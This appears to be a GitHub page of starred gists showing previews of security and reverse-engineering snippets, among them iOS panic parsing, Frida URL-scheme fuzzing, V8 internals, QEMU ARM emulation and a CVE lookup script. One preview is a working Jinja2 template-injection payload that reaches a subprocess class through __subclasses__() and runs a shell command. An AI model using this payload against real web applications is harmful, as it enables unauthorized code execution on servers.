Skip to content

Instantly share code, notes, and snippets.

View iddoeldor's full-sized avatar

iddoeldor

View GitHub Profile
@FrankSpierings
FrankSpierings / jinja-rce-.py
Created December 23, 2019 09:51
Jinja2 Code Exec
import jinja2
# t = 'Variable {{ arg }}\n{% set a = arg.__class__.__base__.__subclasses__() %}{% for i in a %}{{ i }}\n{% endfor %}'
t = 'Variable {{ arg }}\n{{ arg.__class__.__base__.__subclasses__()[-36]("id") }}'
template = jinja2.Template(t)
r = template.render(arg="testing")
print(r)
@PsychoTea
PsychoTea / PanicParser.py
Last active June 11, 2023 19:54
A collection of useful iOS-related scripts
import sys
import json
import re
kslide = 0x0
if len(sys.argv) < 2:
print("Usage: PanicParser.py [file path]")
exit()
@justjavac
justjavac / GetOptimizationStatus.md
Last active March 3, 2025 17:17
V8 %GetOptimizationStatus

%GetOptimizationStatus return a set of bitwise flags instead of a single value, to access the value, you need to take the binary representation of the returned value. Now, for example, if 65 is returned, the binary representation is the following:

(65).toString(2).padStart(12, '0');
// 000001000001

Each binary digit acts as a boolean with the following meaning:

@fxthomas
fxthomas / adbsync
Created July 3, 2019 22:31
Android <> local directory synchronization script using rsync
#!/bin/bash
# Usage: adbsync <remote path> <local path>
# <remote path> defaults to /sdcard/DCIM
# <local path> defaults to .
REMOTE_PATH=${1:-/sdcard/DCIM}
LOCAL_PATH=${2:-.}
REMOTE_PORT=1873
LOCAL_PORT=6010
@int0x33
int0x33 / procmon.sh
Created March 12, 2019 22:18
IFS=$'\n'
old_process=$(ps -eo command)
while true; do
new_process=$(ps -eo command)
diff <(echo "$old_process") <(echo "$new_process") |grep [\<\>]
sleep 1
old_process=$new_process
done
@luk6xff
luk6xff / ARMonQEMUforDebianUbuntu.md
Last active May 13, 2025 12:57 — forked from bruce30262/ARMDebianUbuntu.md
Emulating ARM with QEMU on Debian/Ubuntu

You might want to read this to get an introduction to armel vs armhf.

If the below is too much, you can try Ubuntu-ARMv7-Qemu but note it contains non-free blobs.

Running ARM programs under linux (without starting QEMU VM!)

First, cross-compile user programs with GCC-ARM toolchain. Then install qemu-arm-static so that you can run ARM executables directly on linux

If there's no qemu-arm-static in the package list, install qemu-user-static instead

@netspooky
netspooky / pubsploit.py
Last active November 5, 2020 22:28
import urllib.request, json, sys, textwrap
# Run like
# python3 pubsploit.py CVE-2017-0143
def cveSearch(cve):
with urllib.request.urlopen('http://cve.circl.lu/api/cve/'+cve) as url:
data = json.loads(url.read().decode())
try:
if data['cvss']:
print("{} | CVSS {}".format(cve,data['cvss']))
@grepharder
grepharder / urlschemefuzzer.js
Created January 28, 2019 20:06
/*
* Modified from: https://codeshare.frida.re/@dki/ios-url-scheme-fuzzing/
*
* iOS URL Scheme Fuzzing
* Usage: frida -U --codeshare dki/ios-url-scheme-fuzzing SpringBoard
*
* Open the specified URL
* openURL("somescheme://test");
*
* Fuzz a particular URL - use {0} as placeholder for insertion points
@grepharder
grepharder / universal_links.js
Created January 28, 2019 19:59
@oleavr
oleavr / frida-logging.md
Last active April 7, 2023 08:53
Frida logging hacks

Frida logging helper

For adding temporary logging to help understand behavior. For when it is impractical to use Frida to instrument Frida.

Choose one of these and copy-paste it into e.g. lib/interfaces/session.vala, then use log_event ("name='%s'", name); to log.

When something appears to be hanging, try applying: x-async-debug.patch.